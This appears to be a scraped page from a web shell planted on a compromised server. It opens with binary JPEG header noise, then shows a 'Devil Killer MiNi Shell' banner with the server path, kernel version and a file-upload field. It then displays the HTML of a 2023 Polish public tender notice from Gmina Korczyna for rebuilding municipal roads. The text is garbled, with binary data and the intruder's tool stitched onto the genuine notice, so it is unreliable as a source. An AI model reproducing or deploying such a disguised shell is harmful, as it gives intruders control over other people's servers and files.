JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230405/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230405/0016547001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa dróg gminnych na terenie Gminy Korczyna </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA KORCZYNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370440560</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Rynek 18A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Korczyna</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-420</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">13/43 540 80</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">13/43 540 96</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@korczyna.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.korczyna.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa dróg gminnych na terenie Gminy Korczyna </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-df84cb51-d203-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00165470</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00055974/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Przebudowa dróg gminnych na terenie Gminy Korczyna</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-df84cb51-d203-11ed-9355-06954b8c6cb9 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu:<br/>-Platformy e-Zamówienia: https://ezamówienia.gov.pl<br/><br/>Adres strony internetowej prowadzonego postępowania:<br/>https://korczyna.bip.gov.pl zakładka zamówienia publiczne</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto podmiotu &#34;Wykonawca&#34; na Platformie e-Zamówienia. <br/>Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce &#34;Centrum Pomocy&#34;.<br/>Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu muszą być zgodne z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych. <br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert udziału w postępowaniu odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). <br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem &#34;Formularzy do komunikacji&#34; wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). W przypadku problemów technicznych i awarii związanych z funkcjonowaniem platformy e-Zamówienia użytkownicy mogą korzystać ze wsparcia technicznego dostępnego pod numerem telefonu (032) 77 88 999 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce &#34; Zgłoś problem&#34;. <br/>Zamawiający rekomenduje wykorzystanie formatów: .pdf, .doc, .docx, .rtf, .xps, .odt, .jpg ze szczególnym wskazaniem na .pdf.<br/>W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z rozszerzeń: .zip, .7Z <br/>Wykonawca przygotowuje ofertę przy pomocy interaktywnego &#34;Formularza ofertowego&#34; udostępnionego przez Zamawiającego na Platformie e-Zamówienia i zamieszczonego w podglądzie postępowania w zakładce &#34;Informacje podstawowe&#34;. <br/>UWAGA! Nie należy zmieniać nazwy pliku nadanej przez Platformę e-Zamówienia. Zapisany &#34;Formularz ofertowy&#34; należy zawsze otwierać w programie Adobe Acrobat Reader DC. <br/>Wykonawca składa ofertę za pośrednictwem zakładki &#34;Oferty/wnioski&#34;, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku &#34;Złóż ofertę&#34; system prezentuje okno składania ofert umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop (&#34;przeciągnij&#34; i &#34;upuść&#34; służące do <br/>dodawania plików. <br/>Wykonawca dodaje wybrany z dysku i uprzednio podpisany &#34;Formularz oferty&#34; w pierwszym polu (&#34;Wypełniony formularz oferty&#34;. W kolejnym polu (&#34;Załączniki i inne dokumenty przedstawione w ofercie przez Wykonawcę&#34;) Wykonawca dodaje pozostałe pliki stanowiące ofertę lub składane wraz z ofertą. Jeżeli wraz z ofertą składane są dokumenty zawierające tajemnicę przedsiębiorstwa Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio opisanym pliku wraz z zaznaczeniem w nazwie &#34;Dokument stanowiący tajemnicę przedsiębiorstwa&#34;. <br/>System sprawdza czy złożone pliki są podpisane i automatycznie je szyfruje, jednocześnie informując o tym Wykonawcę. Potwierdzenie czasu przekazania i odbioru oferty znajduje się w Elektronicznym Potwierdzeniu Przesłania (EPP) i Elektronicznym Potwierdzeniu Odebrania (EPO). EPP i EPO dostępne są dla zalogowanego Wykonawcy w zakładce &#34;Oferty/Wnioski&#34;. <br/>Oferta może być złożona tylko do upływu terminu składania ofert. <br/>Wykonawca może przed upływem terminu składania ofert wycofać ofertę. Wykonawca wycofuje ofertę w zakładce &#34;Oferty/Wnioski&#34; używając przycisku &#34;Wycofaj ofertę&#34;. Maksymalny łączny rozmiar plików stanowiących ofertę lub składanych wraz z ofertą to 250 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna dotycząca przetwarzania danych osobowych w prowadzonym postępowaniu o udzielenie zamówienia, wykonania zlecenia, usługi oraz zawarcia i realizacji umowy cywilno-prawnej zgodnie z art. 13 ust. 1 i ust. 2 ogólnego rozporządzenia o ochronie danych (RODO) <br/>1. Administratorem przetwarzanych danych osobowych jest Gmina Korczyna reprezentowana przez Wójta. Kontakt - adres: 38-420 Korczyna, Korczyna 18a, tel. wojt@korczyna.pl<br/>2. Kontakt do Inspektora Ochrony Danych e-mail: iodkorczyna@gmail.com<br/>3. Podstawą prawną przetwarzania danych może być: <br/>a. art. 6 ust. 1 lit. b RODO tj. przetwarzanie jest niezbędne do wykonania umowy, której stroną jest osoba, której dane dotyczą, lub do podjęcia działań na żądanie osoby, której dane dotyczą, przed zawarciem umowy,<br/>b. art. 6 ust. 1 lit. c RODO tj. przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze tj. udzielenia zamówienia zgodnie z obowiązującymi przepisami prawa, w tym ustawy z dnia 23 kwietnia 1964 r. kodeks cywilny (Dz. U. z 2020 r. poz.1740) oraz ustawy z dnia 11 września 2019 r. prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019)<br/>4. Dane osobowe mogą być przetwarzane w celu przeprowadzenia postępowania o udzielenie zamówienia, zawarcia i realizacji umowy, wykonania robót budowlanych. Dane będą przetwarzane w związku z postępowaniem o udzielenie zamówienia publicznego pn. „Przebudowa dróg gminnych na terenie Gminy Korczyna” prowadzonym w trybie podstawowym (art. 275 pkt 1) ustawy Pzp. <br/>5. Podanie danych jest dobrowolne ale konieczne w celu przystąpienia do zamówienia, zawarcia umowy oraz jej realizacji. Nie podanie danych skutkuje brakiem możliwości podjęcia współpracy. <br/>6. Dane będą przechowywane przez okres współpracy, trwania zawartej umowy a po jej zakończeniu przez okres wymagany kategorią archiwalną. W przypadku danych zawartych jedynie na fakturach dane są przechowywane przez okres 5 lat (kat. B5), w przypadku umów cywilnoprawnych bez składki na ubezpieczenie społeczne przez okres 10 lat (kat.B10), natomiast w przypadku opłacania składki społecznej przez okres 50 lat (kat.B50). <br/>7. Administrator może przekazać dane innym odbiorcom jedynie na podstawie przepisów prawa. Odbiorcą danych może być np: operator pocztowy w przypadku prowadzenia korespondencji, bank realizujący usługi bankowe. Szczegóły dotyczące odbiorców można uzyskać w siedzibie Administratora. <br/>8. Administrator nie przekazuje Państwa danych do państwa trzeciego ani do organizacji międzynarodowych. <br/>9. W związku z przetwarzaniem danych osobowych przysługuje żądanie następujących uprawnień: <br/> 1) prawo dostępu do danych osobowych; <br/> 2) prawo do żądania sprostowania danych osobowych – w przypadku gdy dane <br/> są nieprawidłowe lub niekompletne; <br/> 3) prawo do usunięcia danych osobowych - w przypadku gdy ustała podstawa <br/> do ich przetwarzania, dane osobowe przetwarzane są niezgodnie z prawem, <br/> dane osobowe muszą być usunięte w celu wywiązania się z obowiązku <br/> wynikającego z przepisów prawa; <br/> 4) prawo do żądania ograniczenia przetwarzania danych osobowych - w <br/> przypadku, gdy: osoba, której dane dotyczą kwestionuje prawidłowość danych <br/> osobowych, przetwarzanie danych jest niezgodne z prawem, a osoba, której <br/> dane dotyczą, sprzeciwia się usunięciu danych, żądając w zamian ich ograniczenia, Administrator nie potrzebuje już danych dla swoich celów, ale osoba, której dane dotyczą, potrzebuje ich do ustalenia, obrony lub dochodzenia roszczeń.<br/>10. Jeżeli przetwarzanie Państwa danych osobowych narusza przepisy RODO istnieje prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych z siedzibą w Warszawie.<br/>11. W oparciu o Państwa dane osobowe Administrator nie będzie podejmował wobec zautomatyzowanych decyzji, w tym decyzji będących wynikiem profilowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">EPP. 271.4.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są roboty budowlane polegające na przebudowie dróg gminnych zlokalizowanych na terenie Gminy Korczyna:<br/> - w miejscowości Krasna,<br/> - w miejscowości Wola Komborska,<br/><br/>1)	Przebudowa drogi gminnej Nr G 114810R Krasna – Wyspan (ul. Miodowa), <br/>w km 0+000 – 0+225 w następującym zakresie:<br/>a) roboty przygotowawcze i ziemne - roboty pomiarowe przy liniowych robotach ziemnych,<br/>- roboty ziemne wykonywane koparkami podsiębiernymi z transportem urobku <br/> na odległość do 1km, ścięcie poboczy,<br/>b) podbudowa – roboty remontowe – frezowanie nawierzchni bitumicznej o grub. do 8cm z wywozem materiału z rozbiórki na odległość do 1 km do ponownego wbudowania,<br/>- sączki w gruncie kat. III poprzeczne z kruszywa o głębokości 40cm<br/>- stabilizacja podłoża cementem, grubość warstwy po zagęszczeniu 30cm,<br/>- wyrównanie istniejącej podbudowy klińcem kamiennym sortowanym z <br/> zagęszczeniem mechanicznym, średnia grub. warstwy po zagęszczeniu do <br/> 10cm,<br/>- mechaniczne oczyszczenie i skropienie emulsją asfaltową na zimno <br/> podbudowy tłuczniowej lub z gruntu stabilizowanego cementem,<br/>- wyrównanie, wzmocnienie istniejącej podbudowy mieszanką mineralno- <br/> asfaltową z wbudowaniem mechanicznym śred. grub. 5 cm,<br/>c) nawierzchnia – mechaniczne oczyszczenie i skropienie emulsja asfaltową na <br/>zimno podbudowy lub nawierzchni betonowej/bitumicznej, <br/>- nawierzchnia z mieszanek mineralno-bitumicznych – warstwa ścieralna o grub. <br/> 3cm, <br/>- nawierzchnie z frezu Wykonawcy warstwa górna (pobocza, zjazdy) gr. 10cm, <br/> śr. szer. 0,75m obustronnie.<br/><br/>2)	Przebudowa drogi gminnej Nr G 114835R Wola Komborska – Działy w km 0+655 – 0+995 w następującym zakresie:<br/>a) roboty przygotowawcze i ziemne - roboty pomiarowe przy liniowych robotach ziemnych,<br/>- roboty ziemne wykonywane koparkami podsiębiernymi z transportem urobku <br/> na odległość do 1km, ścięcie poboczy,<br/>b) podbudowa – roboty remontowe – frezowanie nawierzchni bitumicznej o grub. do 8cm z wywozem materiału z rozbiórki na odległość do 1 km do ponownego wbudowania,<br/>- sączki w gruncie kat. III poprzeczne z kruszywa o głębokości 40cm,<br/>- stabilizacja podłoża cementem, grubość warstwy po zagęszczeniu 30cm,<br/>- wyrównanie istniejącej podbudowy klińcem kamiennym sortowanym z <br/> zagęszczeniem mechanicznym, średnia grub. warstwy po zagęszczeniu do <br/> 10cm,<br/>- mechaniczne oczyszczenie i skropienie emulsją asfaltową na zimno <br/> podbudowy tłuczniowej lub z gruntu stabilizowanego cementem,<br/>- wyrównanie, wzmocnienie istniejącej podbudowy mieszanką mineralno-<br/> asfaltową z wbudowaniem mechanicznym śred. grub. 5 cm,<br/>c) nawierzchnia – mechaniczne oczyszczenie i skropienie emulsja asfaltową na zimno podbudowy lub nawierzchni betonowej/bitumicznej, <br/>- nawierzchnia z mieszanek mineralno-bitumicznych – warstwa ścieralna o grub. <br/> 3cm, <br/>- nawierzchnie z frezu Wykonawcy warstwa górna (pobocza, zjazdy) gr. 10cm, <br/> śr. szer. 0,75m obustronnie,<br/>- wymiana założonych rur betonowych na rury PVC dwuścienne łączone na <br/> wcisk o śred. wew. 500mm,<br/>- obudowy wylotów rur o średn. 60 cm z kamienia.<br/><br/>Zakres i sposób realizacji przedmiotu zamówienia został szczegółowo opisany w załączonej do SWZ dokumentacji projektowej oraz przedmiarach robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233320-8 - Fundamentowanie dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">długość okresu gwarancji i rekojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1) nie podlegają wykluczeniu z udziału w postępowaniu,<br/>2) spełniają warunki udziału w postępowaniu określone w Specyfikacji Warunków Zamówienia tj.:<br/>1. Spełniają warunek dotyczący zdolności do występowania w obrocie gospodarczym; Określenie warunków:<br/> Zamawiający nie stawia wymagań w tym zakresie.<br/>2. Spełniają warunek dotyczący wymaganych uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej;<br/> Określenie warunków:<br/> Zamawiający nie stawia wymagań w tym zakresie.<br/>3. Spełniają warunek dotyczący sytuacji ekonomicznej lub finansowej; <br/> Określenie warunków:<br/> Zamawiający wymaga aby Wykonawca posiadał ubezpieczenie od <br/> odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z <br/> przedmiotem zamówienia. Suma gwarantowana nie może być mniejsza niż <br/> 100 000,00 PLN<br/>4. Spełniają warunek dotyczący zdolności technicznej lub zawodowej;<br/> Określenie warunków:<br/> a) Zamawiający uzna powyższy warunek za spełniony o ile Wykonawca <br/> wykaże wykonanie co najmniej dwóch robót budowlanych polegających na <br/> budowie, przebudowie lub rozbudowie dróg o nawierzchni bitumicznej o <br/> wartości nie mniejszej niż 200 000,00zł brutto (słownie: dwieście tysięcy <br/> złotych) każda - w okresie ostatnich pięciu lat przed upływem terminu <br/> składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym <br/> okresie wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz <br/> podmiotów, na rzecz których roboty te zostały wykonane oraz załączeniem <br/> dowodów określających czy te roboty budowlane zostały wykonane <br/> należycie, przy czym dowodami, o których mowa, są referencje bądź inne <br/> dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane <br/> zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie <br/> jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/> <br/> Jeżeli wymagane wartości robót wyrażone będą w innej walucie niż PLN, <br/> Zamawiający przeliczy te wartości w oparciu o średni kurs walut Narodowego <br/> Banku Polskiego (dalej: NBP) dla danej waluty z dnia, w którym nastąpi <br/> publikacja przedmiotowego postępowania.<br/> Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP, Zamawiający <br/> przyjmie średni kurs z ostatniego dnia przed dniem publikacji.<br/><br/> b) Zamawiający uzna powyższy warunek za spełniony o ile Wykonawca <br/> wykaże dysponowanie, co najmniej jedną osobą – Kierownikiem budowy <br/> posiadającym uprawnienia budowlane do kierowania robotami budowlanymi <br/> w specjalności drogowej.<br/><br/> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ww. warunek można spełnić łącznie. <br/> <br/> Wskazana osoba podczas realizacji robót budowlanych musi posiadać ważne zaświadczenie o przynależności do właściwej izby samorządu zawodowego w rozumieniu ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów oraz inżynierów budownictwa (Dz. U. z 2019 poz. 1117 ze zm.). <br/> <br/> Zamawiający informuje, że posiadane przez osoby uprawnienia w wymaganym zakresie, stosownie do wymagań określonych w ogłoszeniu i SWZ powinny być zgodne z ustawą z dnia 7 lipca 1994r. Prawo budowlane (D z. U. z 2019r., poz. 1186). Osoby, które posiadają uzyskane przed dniem wejścia w życie ustawy z dnia 7 lipca 1994r. Prawo budowlane, uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego odpowiednie do realizacji przedmiotu zamówienia, do pełnienia samodzielnych funkcji technicznych w budownictwie i zachowały 